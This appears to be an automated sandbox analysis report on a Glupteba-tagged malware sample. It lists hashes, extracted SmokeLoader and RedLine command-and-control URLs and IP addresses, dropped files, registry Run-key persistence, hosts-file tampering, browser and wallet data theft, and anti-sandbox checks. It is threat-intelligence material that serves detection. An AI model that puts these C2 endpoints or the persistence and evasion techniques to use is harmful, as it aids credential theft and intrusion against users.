glupteba | 64dc2b5958fe37dd9733928c156e0c75ab544e2e0169f9f796c3f3db809bcbe5

Target

toolspab2 (20).exe
Size

315KB
MD5

585c257e0b345b762e7cdc407d8f9da2
SHA1

ffee403d97b76c3460fc166b9d5ce1205cd216a5
SHA256

4a0ecbcf9b54ed1c9654eb9ee214a797f48c980c6d03a261f62fa9671a2733d6
SHA512

14d39a6cd1c6d912cae7c35e2a98affcd5a9c1df6b947c42de65344e08d34912b09ccac83f9d8c3213b4e3d555769801e8218cb3f4b970d1d08606ee5a454ba8

Score

10^/10

glupteba metasploit redline smokeloader socelars ytmaloy backdoor discovery dropper evasion infostealer loader persistence spyware stealer trojan

Malware Config

Extracted

Family

smokeloader

Version

2020

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32

Extracted

Family

redline

Botnet

YTMaloy

87.251.71.125:80

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

redline

82.202.161.37:26317

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 2 IoCs

Processes:

resource	yara_rule
behavioral25/memory/1720-187-0x00000000029F0000-0x0000000003316000-memory.dmp	family_glupteba
behavioral25/memory/1720-189-0x0000000000400000-0x0000000000D41000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 5 IoCs

Processes:

resource	yara_rule
behavioral25/memory/1732-108-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline
behavioral25/memory/1732-109-0x0000000000417E96-mapping.dmp	family_redline
behavioral25/memory/1732-111-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline
behavioral25/memory/2104-255-0x0000000000510000-0x000000000052B000-memory.dmp	family_redline
behavioral25/memory/2104-256-0x0000000001E50000-0x0000000001E69000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 1 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\8187.exe	family_socelars

Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
evasion

Software Discovery
T1518
Downloads MZ/PE file
Drops file in Drivers directory 1 IoCs

Processes:

134 Vaporeondè_éçè_)))_.exe

description ioc process

File opened for modification C:\Windows\system32\drivers\etc\hosts 134 Vaporeondè_éçè_)))_.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	134 Vaporeondè_éçè_)))_.exe

Executes dropped EXE 35 IoCs

Processes:

EA30.exeEC91.exe11BE.exe177A.exe591C.exe591C.exeF4A1.exeU1PwSASbnJZ1Nt2.eXE1AC7.exe1AC7.tmp27B3.exe27B3.exe134 Vaporeondè_éçè_)))_.exeirecord.exeirecord.tmpSepypitiqy.exeMejaelaelolae.exeI-Record.exe8187.exe8C32.exehtwccubtjwccubhtwccubtoolspab1.exetoolspab1.exetjwccubhtwccubhtwccubtjwccubhtwccubhtwccubE0B9.exeE230.exe0~NM~WIL.eXeE618.exe

pid	process
268	EA30.exe
1184	EC91.exe
1300	11BE.exe
1920	177A.exe
1700	591C.exe
1732	591C.exe
296	F4A1.exe
1464	U1PwSASbnJZ1Nt2.eXE
1600	1AC7.exe
1072	1AC7.tmp
1720	27B3.exe
1196	27B3.exe
1288	134 Vaporeondè_éçè_)))_.exe
892	irecord.exe
1620	irecord.tmp
2040	Sepypitiqy.exe
1176	Mejaelaelolae.exe
1756	I-Record.exe
856	8187.exe
2104	8C32.exe
2224	htwccub
2536	tjwccub
2160	htwccub
1264	toolspab1.exe
2608	toolspab1.exe
2864	tjwccub
1592	htwccub
3028	htwccub
2132	tjwccub
2280	htwccub
2496	htwccub
2840	E0B9.exe
2936	E230.exe
2632	0~NM~WIL.eXe
2488	E618.exe

Deletes itself 1 IoCs

Processes:

pid process

1356

pid	process
1356

Loads dropped DLL 32 IoCs

Processes:

toolspab2 (20).exe177A.exe591C.execmd.exeregsvr32.exe1AC7.exe1AC7.tmpirecord.exeirecord.tmpI-Record.exehtwccubtoolspab1.exetjwccubhtwccubtjwccubhtwccubtjwccubcmd.exeregsvr32.exe

pid	process
812	toolspab2 (20).exe
1920	177A.exe
1700	591C.exe
1848	cmd.exe
632	regsvr32.exe
1600	1AC7.exe
1072	1AC7.tmp
1072	1AC7.tmp
1072	1AC7.tmp
1072	1AC7.tmp
892	irecord.exe
1620	irecord.tmp
1620	irecord.tmp
1620	irecord.tmp
1620	irecord.tmp
1620	irecord.tmp
1756	I-Record.exe
1756	I-Record.exe
1756	I-Record.exe
1756	I-Record.exe
1756	I-Record.exe
1756	I-Record.exe
1756	I-Record.exe
2160	htwccub
1264	toolspab1.exe
2536	tjwccub
3028	htwccub
2864	tjwccub
2496	htwccub
2132	tjwccub
2544	cmd.exe
856	regsvr32.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

134 Vaporeondè_éçè_)))_.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Mail\\Saxaelupika.exe\""	134 Vaporeondè_éçè_)))_.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs

Processes:

regsvr32.exeregsvr32.exe

pid process

632 regsvr32.exe
856 regsvr32.exe

pid	process
632	regsvr32.exe
856	regsvr32.exe

Suspicious use of SetThreadContext 6 IoCs

Processes:

toolspab2 (20).exe591C.exehtwccubtoolspab1.exehtwccubhtwccub

description	pid	process	target process
PID 452 set thread context of 812	452	toolspab2 (20).exe	toolspab2 (20).exe
PID 1700 set thread context of 1732	1700	591C.exe	591C.exe
PID 2224 set thread context of 2160	2224	htwccub	htwccub
PID 1264 set thread context of 2608	1264	toolspab1.exe	toolspab1.exe
PID 1592 set thread context of 3028	1592	htwccub	htwccub
PID 2280 set thread context of 2496	2280	htwccub	htwccub

Drops file in Program Files directory 30 IoCs

Processes:

irecord.tmp134 Vaporeondè_éçè_)))_.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\i-record\unins000.dat	irecord.tmp
File opened for modification	C:\Program Files (x86)\i-record\I-Record.exe	irecord.tmp
File opened for modification	C:\Program Files (x86)\i-record\swscale-2.dll	irecord.tmp
File opened for modification	C:\Program Files (x86)\i-record\avdevice-53.dll	irecord.tmp
File created	C:\Program Files (x86)\i-record\unins000.dat	irecord.tmp
File created	C:\Program Files (x86)\i-record\is-31QED.tmp	irecord.tmp
File created	C:\Program Files (x86)\i-record\is-0MDIQ.tmp	irecord.tmp
File created	C:\Program Files (x86)\i-record\is-A30AT.tmp	irecord.tmp
File created	C:\Program Files (x86)\Windows Mail\Saxaelupika.exe	134 Vaporeondè_éçè_)))_.exe
File created	C:\Program Files (x86)\i-record\is-F5OK5.tmp	irecord.tmp
File created	C:\Program Files (x86)\i-record\is-VH0DH.tmp	irecord.tmp
File opened for modification	C:\Program Files (x86)\i-record\avformat-53.dll	irecord.tmp
File opened for modification	C:\Program Files (x86)\i-record\postproc-52.dll	irecord.tmp
File created	C:\Program Files (x86)\i-record\is-03SAB.tmp	irecord.tmp
File created	C:\Program Files (x86)\i-record\is-HGTCT.tmp	irecord.tmp
File created	C:\Program Files (x86)\i-record\is-RE3BM.tmp	irecord.tmp
File opened for modification	C:\Program Files (x86)\i-record\AForge.Video.FFMPEG.dll	irecord.tmp
File created	C:\Program Files\7-Zip\OCEKORKVLM\irecord.exe	134 Vaporeondè_éçè_)))_.exe
File opened for modification	C:\Program Files (x86)\i-record\avcodec-53.dll	irecord.tmp
File created	C:\Program Files (x86)\i-record\is-IU6FF.tmp	irecord.tmp
File created	C:\Program Files (x86)\i-record\is-H0DA8.tmp	irecord.tmp
File created	C:\Program Files (x86)\i-record\is-2E9IE.tmp	irecord.tmp
File opened for modification	C:\Program Files (x86)\i-record\AForge.Video.dll	irecord.tmp
File created	C:\Program Files (x86)\i-record\is-A9E70.tmp	irecord.tmp
File created	C:\Program Files\7-Zip\OCEKORKVLM\irecord.exe.config	134 Vaporeondè_éçè_)))_.exe
File opened for modification	C:\Program Files (x86)\i-record\avfilter-2.dll	irecord.tmp
File opened for modification	C:\Program Files (x86)\i-record\avutil-51.dll	irecord.tmp
File opened for modification	C:\Program Files (x86)\i-record\swresample-0.dll	irecord.tmp
File created	C:\Program Files (x86)\Windows Mail\Saxaelupika.exe.config	134 Vaporeondè_éçè_)))_.exe
File created	C:\Program Files (x86)\i-record\is-V9HMT.tmp	irecord.tmp

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 24 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

tjwccubtjwccubtoolspab2 (20).exe177A.exehtwccubhtwccubtjwccubhtwccub

description	ioc	process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	tjwccub
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	tjwccub
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspab2 (20).exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspab2 (20).exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	177A.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	177A.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	htwccub
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	htwccub
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	tjwccub
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	htwccub
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	tjwccub
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	177A.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	htwccub
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	htwccub
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	htwccub
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	tjwccub
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	htwccub
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspab2 (20).exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	tjwccub
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	tjwccub
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	htwccub
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	htwccub
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	tjwccub
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	tjwccub

Kills process with taskkill 3 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid process

1624 taskkill.exe
2428 taskkill.exe
2464 taskkill.exe

pid	process
1624	taskkill.exe
2428	taskkill.exe
2464	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 64 IoCs

adware spyware

Modify Registry

T1112

Processes:

iexplore.exeIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEmshta.exeIEXPLORE.EXEmshta.exe

description	ioc	process
Set value (data)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\acnav.online\Total = "0"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3200000032000000b804000097020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\acnav.online	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.acnav.online\ = "18"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000a711518ddc9c5f45addff4594541b81f00000000020000000000106600000001000020000000ca49c8e3f2f85fe1bd128013aa83e73c3e60e3b132527f3c5e938dbd80883331000000000e800000000200002000000060db45611d9b8b98f2139acbcefeb6f47d21b3cdd7fee087706401e6f2b0edcd20000000c73bde51819d7fd09a55298ab50e29c033ebd1744296a375b719802c1c1033c940000000b53cac5866951ef0c11550c862e75811f4818094dfa60535549f10f05e81a72cfeda84f9ea257e8cddadf24b7fd4f9b052f1f468ffcc31b91e57ed61ae033164	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "0"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000a711518ddc9c5f45addff4594541b81f000000000200000000001066000000010000200000004ad62988478e4d64906ba15288ee7a00a8372110c2145aa48265635bcbb1b58d000000000e8000000002000020000000be1fbb6e98842af5924e67252929a8cafa7dd9328be6194f5820014149613799900000004d3b9036bd006417f7c3afa0a2695365eecb66017f2a61d713d496dec186ab2680505ef809899b2e723ee3c93a59b96c8cf55fd1c5cbd9e6d83e22e8ce6d450a5a1fd056c9f6b1fffcd469f3234eb5716087c94ab2bfcff5c186f45a4aee7adf9b397cbc0c443cef3fb6e2b41445388f4d1f9fbeee1517cd446769913f015f7270b1d6579ce25997fa0b7f653024655f4000000038706973a838783083f0e717e87cae34399ba45e75a840b0a8faa0fe4cf14e6a442dfb671b4f9a32db56364a9f318e7f186f1fbe30b912293e9cc7b6a89f0f87	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "18"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.acnav.online\ = "0"	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff5600000000000000dc04000065020000	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff19000000190000009f0400007e020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.acnav.online	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "332604760"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 10de2e40cd74d701	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff6f00000019000000f50400007e020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{4CFBE9A1-E0BF-11EB-9A32-C670C171E3F2} = "0"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff00000000000000008604000065020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\acnav.online\NumberOfSubdomains = "1"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\acnav.online\Total = "18"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

27B3.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	27B3.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-501 = "Nepal Daylight Time"	27B3.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time"	27B3.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	27B3.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	27B3.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time"	27B3.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time"	27B3.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-431 = "Iran Daylight Time"	27B3.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time"	27B3.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time"	27B3.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	27B3.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time"	27B3.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-22 = "Cape Verde Standard Time"	27B3.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time"	27B3.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-221 = "Alaskan Daylight Time"	27B3.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time"	27B3.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time"	27B3.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-461 = "Afghanistan Daylight Time"	27B3.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-151 = "Central America Daylight Time"	27B3.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time"	27B3.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time"	27B3.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time"	27B3.exe
